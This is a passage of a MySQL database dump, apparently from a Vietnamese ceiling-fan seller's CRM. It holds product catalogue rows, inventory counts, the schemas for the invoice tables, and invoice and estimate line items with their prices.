(246, 1872, 'HA132', 'Quạt trần cánh gỗ PELICAN 52 Dark Walnut', '0', '0'),
(247, 1873, 'HA133', 'Quạt trần phòng khách SANDY 66 KOA ABS', '0', '0'),
(248, 1874, 'HA134', 'Quạt trần phòng khách SANDY 66 Sliver', '0', '0'),
(249, 1875, 'HA135', 'Quạt trần thấp AROMA 60 BN Maple Wood', '0', '0'),
(250, 1876, 'HA136', 'Quạt trần thấp AROMA 60 Dark Walnut', '0', '0'),
(251, 1877, 'HA137', 'Quạt trần thấp AROMA 52 BN Maple Wood', '0', '0'),
(252, 1878, 'HA138', 'Quạt trần thấp AROMA 52 Dark Walnut', '0', '0'),
(253, 1879, 'HA139', 'Quạt trần 3 cánh gỗ PEARL 60 White', '0', '0'),
(254, 1880, 'HA140', 'Quạt trần 3 cánh gỗ PEARL 60 Black', '0', '0'),
(255, 1881, 'HA141', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '0', '0'),
(256, 1882, 'HA142', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '0', '0'),
(257, 1883, 'HA143', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '0', '0'),
(258, 1884, 'HA144', 'Quạt trần cánh gỗ ONIX 56 Sliver Wood', '0', '0'),
(259, 1885, 'HA145', 'Quạt trần KAREN ABS', '0', '0'),
(260, 1886, 'HA146', 'Quạt trần MAGIC 56 WOOD', '0', '0'),
(261, 1887, 'HA147', 'Quạt trần MALTA 65', '0', '0'),
(262, 1888, 'HA148', 'Quạt trần SAONA 52 LED BLACK 52YFT-7062B', '0', '0'),
(263, 1889, 'HA149', 'Quạt trần SAONA 52 LED WHITE 52YFT-7062W (màu trắng)', '0', '0'),
(264, 1890, 'HA150', 'Quạt trần SAONA OKA 52YFT-7062A (màu vân gỗ)', '0', '0'),
(265, 1891, 'HA151', 'Quạt trần SAONA SLIVER 52YFT-7062S (màu Bạc)', '0', '0'),
(266, 1892, 'HA152', 'Quạt trần SONA 52 PLYWOOD', '0', '0'),
(267, 1893, 'HA153', 'Quạt trần SPINY 52 BLACK', '0', '0'),
(268, 1894, 'HA154', 'Quạt trần SPINY 52 LED BLACK', '0', '0'),
(269, 1895, 'HA155', 'Quạt trần SABA 52 LED Antique Brass', '0', '0'),
(270, 1896, 'HA156', 'Quạt trần SABA 52 LED Black', '0', '0'),
(271, 1897, 'HA157', 'Quạt trần tiết kiệm điện TOBAGO 52 BLACK', '0', '0'),
(272, 1898, 'HA158', 'Quạt trần tiết kiệm điện TOBAGO 52 SLIVER', '0', '0'),
(273, 1899, 'HA159', 'Quạt trần tiết kiệm điện TOBAGO 52 WHITE', '0', '0'),
(274, 1900, 'HA160', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', '0', '0'),
(275, 1901, 'HA161', 'Quạt trần đèn trí SIROCO 52', '0', '0'),
(276, 1902, 'HA162', 'Quạt trần 3 cánh CAVANIA DC 52812', '0', '0'),
(277, 1903, 'HA163', 'Quạt trần 5 cánh kiểu cổ điển CAMELIA 56', '0', '0'),
(278, 1904, 'HA164', 'Quạt trần 5 cánh SAMANA màu KOA', '0', '0'),
(279, 1905, 'HA165', 'Quạt trần 5 cánh SAMANA màu WH', '0', '0'),
(280, 1906, 'HA166', 'Quạt trần nhà thấp AVIA 52 LED Sliver', '0', '0'),
(281, 1907, 'HA167', 'Quạt trần nhà thấp AVIA 52 SLIVER', '0', '0'),
(282, 1908, 'HA168', 'Quạt trần kiểu bán cổ điển BELLA 56', '0', '0'),
(283, 1909, 'HA169', 'Quạt trần cánh ABS VANILLA 52 có 3 đèn', '0', '0'),
(284, 1910, 'HA170', 'Quạt trần cánh ABS VANILLA 52 , không đèn', '0', '0'),
(285, 1911, 'HA171', 'Quạt trần cánh lớn DELTA 100 KOA Aluminium', '0', '0'),
(286, 1912, 'HA172', 'Quạt trần cánh lớn DELTA BIG FAN 100 Sliver Aluminium', '0', '0'),
(287, 1913, 'HA173', 'Quạt trần cao cấp LINES 60 Black', '0', '0'),
(288, 1914, 'HA174', 'Quạt trần cao cấp LINES 60 Sliver', '0', '0'),
(289, 1915, 'HA175', 'Quạt trần cao cấp ORION JAPAN', '0', '0'),
(290, 1916, 'HA176', 'Quạt trần cao cấp SIMONE LED', '0', '0'),
(291, 1917, 'HA177', 'Quạt trần cao cấp Wegarce WG9018', '0', '0'),
(292, 1918, 'HA178', 'Quạt trần nhà xưởng công nghiệp Powerfoil X3.0 Plus', '0', '0'),
(293, 1919, 'HA179', 'Quạt trần nhà xưởng công nghiệp Powerfoil X3.0', '0', '0'),
(294, 1920, 'HA180', 'Quạt trần nhà xưởng công nghiệp Powerfoil 8 Plus', '0', '0'),
(295, 1921, 'HA181', 'Quạt trần nhà xưởng công nghiệp Powerfoil 8', '0', '0'),
(296, 1922, 'HA182', 'Quạt trần nhà xưởng công nghiệp Powerfoil D', '0', '0'),
(297, 1923, 'HA183', 'Quạt trần công nghiệp chuyên cho nhà máy Powerfoil®X3.0 Washdown', '0', '0'),
(298, 1924, 'HA184', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '0', '0'),
(299, 1925, 'HA185', 'Nhân công lắp đặt trần bê tông', '0', '0'),
(300, 1926, 'HA186', 'Quạt cổ Marelli 3 cánh (sản phẩm phục chế)', '0', '0'),
(302, 1930, 'HA188', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', '0', '0'),
(303, 1931, 'HA189', 'Quạt trần cánh lớn NEVIS màu Sliver alumium 93YFT7046', '0', '0'),
(305, 1938, 'HA191', 'Bộ đèn LED quạt trần', '0', '0'),
(306, 1939, 'HA192', 'Quạt trần Mountain Air 52YFT-002', '0', '0'),
(307, 1943, 'HA196', 'Quạt trần KATRINA 52 Gray Maple', '0', '0'),
(308, 1944, 'HA197', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', '0', '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblinventory_manage`
--

CREATE TABLE `tblinventory_manage` (
  `id` int(10) UNSIGNED NOT NULL,
  `warehouse_id` int(11) NOT NULL,
  `commodity_id` int(11) NOT NULL,
  `inventory_number` varchar(100) DEFAULT NULL,
  `date_manufacture` date DEFAULT NULL,
  `expiry_date` date DEFAULT NULL,
  `lot_number` varchar(100) DEFAULT NULL,
  `purchase_price` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblinventory_manage`
--

INSERT INTO `tblinventory_manage` (`id`, `warehouse_id`, `commodity_id`, `inventory_number`, `date_manufacture`, `expiry_date`, `lot_number`, `purchase_price`) VALUES
(1, 1, 1932, '1000', NULL, '0000-00-00', '', NULL),
(2, 1, 1882, '10', NULL, NULL, NULL, NULL),
(3, 1, 1943, '5', NULL, NULL, NULL, NULL),
(4, 1, 1944, '13', NULL, NULL, NULL, NULL),
(5, 1, 1953, '6', NULL, NULL, NULL, NULL),
(6, 1, 1913, '16', NULL, NULL, NULL, NULL),
(7, 1, 1968, '18', NULL, NULL, NULL, NULL),
(8, 1, 1812, '15', '2023-12-01', '2024-01-24', '', 30800000.00),
(9, 1, 1855, '4', NULL, NULL, NULL, NULL),
(10, 1, 1948, '17', NULL, NULL, NULL, NULL),
(11, 1, 1850, '3', NULL, NULL, NULL, NULL),
(12, 1, 1853, '5', NULL, NULL, NULL, NULL),
(13, 1, 1852, '4', NULL, NULL, NULL, NULL),
(14, 1, 1840, '2', NULL, NULL, NULL, NULL),
(15, 1, 1963, '2', NULL, NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblinvoicepaymentrecords`
--

CREATE TABLE `tblinvoicepaymentrecords` (
  `id` int(11) NOT NULL,
  `invoiceid` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `paymentmode` varchar(40) DEFAULT NULL,
  `paymentmethod` varchar(191) DEFAULT NULL,
  `date` date NOT NULL,
  `daterecorded` datetime NOT NULL,
  `note` text NOT NULL,
  `transactionid` mediumtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblinvoices`
--

CREATE TABLE `tblinvoices` (
  `id` int(11) NOT NULL,
  `sent` tinyint(1) NOT NULL DEFAULT 0,
  `datesend` datetime DEFAULT NULL,
  `clientid` int(11) NOT NULL,
  `deleted_customer_name` varchar(100) DEFAULT NULL,
  `number` int(11) NOT NULL,
  `prefix` varchar(50) DEFAULT NULL,
  `number_format` int(11) NOT NULL DEFAULT 0,
  `datecreated` datetime NOT NULL,
  `date` date NOT NULL,
  `duedate` date DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `total` decimal(15,2) NOT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `hash` varchar(32) NOT NULL,
  `status` int(11) DEFAULT 1,
  `clientnote` text DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `last_overdue_reminder` date DEFAULT NULL,
  `last_due_reminder` date DEFAULT NULL,
  `cancel_overdue_reminders` int(11) NOT NULL DEFAULT 0,
  `allowed_payment_modes` mediumtext DEFAULT NULL,
  `token` mediumtext DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` varchar(30) NOT NULL,
  `recurring` int(11) NOT NULL DEFAULT 0,
  `recurring_type` varchar(10) DEFAULT NULL,
  `custom_recurring` tinyint(1) NOT NULL DEFAULT 0,
  `cycles` int(11) NOT NULL DEFAULT 0,
  `total_cycles` int(11) NOT NULL DEFAULT 0,
  `is_recurring_from` int(11) DEFAULT NULL,
  `last_recurring_date` date DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `sale_agent` int(11) NOT NULL DEFAULT 0,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) NOT NULL,
  `show_shipping_on_invoice` tinyint(1) NOT NULL DEFAULT 1,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `project_id` int(11) DEFAULT 0,
  `subscription_id` int(11) NOT NULL DEFAULT 0,
  `short_link` varchar(100) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblitemable`
--

CREATE TABLE `tblitemable` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(15) NOT NULL,
  `description` mediumtext NOT NULL,
  `long_description` mediumtext DEFAULT NULL,
  `qty` decimal(15,2) NOT NULL,
  `rate` decimal(15,2) NOT NULL,
  `unit` varchar(40) DEFAULT NULL,
  `item_order` int(11) DEFAULT NULL,
  `discount` int(11) DEFAULT 0,
  `item_image` varchar(256) DEFAULT NULL,
  `wh_delivered_quantity` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblitemable`
--

INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(13, 2, 'credit_note', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 20.00, 6500000.00, '', 1, 0, NULL, 0.00),
(17, 2, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(18, 1, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 3.00, 5800000.00, '', 1, 0, NULL, 0.00),
(19, 3, 'estimate', 'Quạt trần cánh lớn Essence 3m', '', 2.00, 177850000.00, '', 1, 0, NULL, 0.00),
(20, 3, 'invoice', 'Quạt trần cánh lớn Essence 3m', '', 2.00, 177850000.00, '', 1, 0, NULL, 0.00),
(21, 4, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(22, 3, 'credit_note', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(23, 4, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(24, 5, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 6500000.00, '', 1, 0, NULL, 0.00),
(25, 5, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 6500000.00, '', 1, 0, NULL, 0.00),
(26, 6, 'estimate', 'Bộ điều khiển AC 3 tốc độ SengQi', '', 4.00, 500000.00, '', 1, 0, NULL, 0.00),
(27, 4, 'credit_note', 'Quạt cổ Marelli 3 cánh (sản phẩm phục chế)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: AC motor, công suất 100W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood Dark <br />\r\nMàu sắc thân quạt: Black', 3.00, 9500000.00, '', 1, 0, NULL, 0.00),
(28, 5, 'credit_note', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(29, 5, 'credit_note', 'Quạt trần SINO LED 52 Black Dark Wood', '', 1.00, 6500000.00, '', 2, 0, NULL, 0.00),
(30, 5, 'credit_note', 'Quạt trần SINO LED 52 White Wood', '', 2.00, 6600000.00, '', 3, 0, NULL, 0.00),
(31, 5, 'credit_note', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 4.00, 500000.00, '', 4, 0, NULL, 0.00),
(32, 6, 'invoice', 'Quạt cổ Marelli 3 cánh (sản phẩm phục chế)', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: AC motor, công suất 100W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood Dark <br />\r\nMàu sắc thân quạt: Black', 3.00, 9500000.00, '', 1, 0, NULL, 0.00),
(33, 7, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(34, 7, 'invoice', 'Quạt trần SINO LED 52 Black Wood', '', 1.00, 6500000.00, '', 2, 0, NULL, 0.00),
(35, 7, 'invoice', 'Quạt trần SINO LED 52 White Wood', '', 2.00, 6600000.00, '', 3, 0, NULL, 0.00),
(36, 7, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 4.00, 500000.00, '', 4, 0, NULL, 0.00),
(37, 8, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 5200000.00, '', 1, 0, NULL, 0.00),
(38, 8, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(39, 9, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4200000.00, '', 1, 0, NULL, 0.00),
(40, 9, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(41, 10, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 4550000.00, '', 1, 0, NULL, 0.00),
(42, 11, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '', 2.00, 5000000.00, '', 1, 0, NULL, 0.00),
(43, 11, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 3.00, 4200000.00, '', 2, 0, NULL, 0.00),
(44, 11, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 5.00, 400000.00, '', 3, 0, NULL, 0.00),
(45, 12, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4200000.00, '', 1, 0, NULL, 0.00),
(46, 12, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(47, 6, 'credit_note', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Phí bảo dưỡng, sửa chữa lắp đặt quạt bị kêu, rung lắc, tháo ráp, kiểm tra...', 1.00, 300000.00, 'cái', 1, 0, NULL, 0.00),
(50, 7, 'estimate', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(51, 13, 'invoice', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(54, 8, 'estimate', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4550000.00, '', 1, 0, NULL, 0.00),
(55, 8, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(56, 14, 'invoice', 'Haiku L 44 inch Black', '', 2.00, 15725000.00, '', 1, 0, NULL, 0.00),
(57, 15, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4875000.00, '', 1, 0, NULL, 0.00),
(58, 16, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4500000.00, '', 1, 0, NULL, 0.00),
(59, 16, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(60, 17, 'invoice', 'Quạt trần cánh lớn NEVIS màu Sliver alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nCông suất động cơ: tiêu chuẩn BLDC, 100W <br />\r\nMàu sắc: Sliver Aluminium <br />\r\n <br />\r\n', 1.00, 19600000.00, '', 1, 0, NULL, 0.00),
(61, 17, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 800000.00, '', 2, 0, NULL, 0.00),
(62, 18, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4480000.00, '', 1, 0, NULL, 0.00),
(63, 18, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(64, 19, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 1.00, 5940000.00, '', 1, 0, NULL, 0.00),
(65, 20, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', '', 1.00, 4100000.00, '', 1, 0, NULL, 0.00),
(66, 20, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4100000.00, '', 2, 0, NULL, 0.00),
(67, 20, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 3, 0, NULL, 0.00),
(68, 21, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 White Maple Wood', 'Đường kính cánh: 132cm  <br />\r\nĐộng cơ: BLDC motor, công suất 35W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: White', 1.00, 4200000.00, '', 1, 0, NULL, 0.00),
(69, 21, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 1.00, 5100000.00, '', 2, 0, NULL, 0.00),
(70, 22, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt ', 'Phí bảo dưỡng, sửa chữa lắp đặt quạt bị kêu, rung lắc, tháo ráp, kiểm tra...', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(71, 23, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(72, 23, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(73, 24, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 5.00, 4880000.00, '', 1, 0, NULL, 0.00),
(74, 24, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 5.00, 400000.00, '', 2, 0, NULL, 0.00),
(75, 25, 'invoice', 'Quạt trần thấp AROMA 52 BN Maple Wood', '', 4.00, 4602500.00, '', 1, 0, NULL, 0.00),
(76, 25, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 4.00, 300000.00, '', 2, 0, NULL, 0.00),
(77, 26, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 4360000.00, '', 1, 0, NULL, 0.00),
(78, 26, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(79, 27, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 5200000.00, '', 1, 0, NULL, 0.00),
(80, 27, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(81, 28, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 5850000.00, '', 1, 0, NULL, 0.00),
(82, 28, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(83, 29, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 5200000.00, '', 1, 0, NULL, 0.00),
(84, 29, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(85, 9, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt ', 'Phí bảo dưỡng, sửa chữa lắp đặt quạt bị kêu, rung lắc, tháo ráp, kiểm tra...', 1.00, 500000.00, 'cái', 1, 0, NULL, 0.00),
(86, 9, 'estimate', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 4350000.00, '', 2, 0, NULL, 0.00),
(87, 30, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 4600000.00, '', 1, 0, NULL, 0.00),
(88, 30, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(89, 31, 'invoice', 'Haiku 60 inch Cocoa Bamboo', '', 1.00, 34000000.00, '', 1, 0, NULL, 0.00),
(90, 31, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 5.00, 400000.00, '', 2, 0, NULL, 0.00),
(91, 31, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '', 4.00, 5500000.00, '', 3, 0, NULL, 0.00),
(92, 32, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 1.00, 4420000.00, '', 1, 0, NULL, 0.00),
(93, 33, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 6.00, 4760000.00, '', 1, 0, NULL, 0.00),
(94, 33, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 6.00, 0.00, '', 2, 0, NULL, 0.00),
(95, 34, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Black', '', 5.00, 5660000.00, '', 1, 0, NULL, 0.00),
(96, 35, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(97, 35, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4550000.00, '', 2, 0, NULL, 0.00),
(98, 6, 'estimate', 'Nhân công lắp đặt trần bê tông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(99, 36, 'invoice', 'Bộ điều khiển AC 3 tốc độ SengQi', '', 4.00, 500000.00, '', 1, 0, NULL, 0.00),
(100, 36, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(104, 10, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Miễn phí (đã bao gồm)', 4.00, 0.00, '', 1, 0, NULL, 0.00),
(105, 10, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 4.00, 6800000.00, '', 2, 0, NULL, 0.00),
(106, 37, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Miễn phí (đã bao gồm)', 4.00, 0.00, '', 1, 0, NULL, 0.00),
(107, 37, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 4.00, 6800000.00, '', 2, 0, NULL, 0.00),
(108, 38, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 4350000.00, '', 1, 0, NULL, 0.00),
(109, 39, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 2.00, 4350000.00, '', 1, 0, NULL, 0.00),
(110, 40, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 1.00, 4950000.00, '', 1, 0, NULL, 0.00),
(111, 40, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(112, 41, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 4600000.00, '', 1, 0, NULL, 0.00),
(113, 42, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4550000.00, '', 1, 0, NULL, 0.00),
(114, 42, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 850000.00, '', 2, 0, NULL, 0.00),
(115, 43, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4625000.00, '', 1, 0, NULL, 0.00),
(116, 11, 'estimate', 'Quạt trần SINO LED 52 White Wood', '', 2.00, 4725000.00, '', 1, 0, NULL, 0.00),
(117, 11, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 2, 0, NULL, 0.00),
(118, 11, 'estimate', 'Chi phí vận chuyển', 'Ga HCM - HN', 1.00, 400000.00, 'lots', 3, 0, NULL, 0.00),
(119, 12, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Model: DCF-SW60605<br />\r\nSố Cánh Quạt: 3 cánh<br />\r\nNguồn Điện: 220V/50-60Hz<br />\r\nĐiều Khiển:  DC 5 cấp độ kèm theo<br />\r\nCông Suất Động Cơ: 35W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).<br />\r\nHiệu suất gió mát và êm Cấp Độ Gió 5 cấp độ gió.<br />\r\nĐiều khiển DC sử dụng quay đổi chiều trực tiếp trên điều khiển<br />\r\nĐộng Cơ: motor DC (Brushless DC™)<br />\r\nSải Cánh (Đường Kính) 142cm/56inch<br />\r\nThương Hiệu: Tổ chức đào tạo WIT™', 2.00, 4875000.00, '', 1, 0, NULL, 0.00),
(120, 13, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'MODEL NO.: DCF-FS52930<br />\r\n- Fan size: 60inch ~ 1520mm, 3 blades solid Wood<br />\r\n- DC motor spec: DC Motor with BLDC, 38W<br />\r\n- Speed: 230 RPM<br />\r\n- Material blades: Wood, 3 blades<br />\r\n- Control: Remote control DC 5 speed included<br />\r\n- Power Input: 220V-240V/50Hz<br />\r\n- Finished Color: Matte Black<br />\r\n- Color: Dark Walnut<br />\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China', 2.00, 6600000.00, '', 1, 0, NULL, 0.00),
(121, 12, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 2, 0, NULL, 0.00),
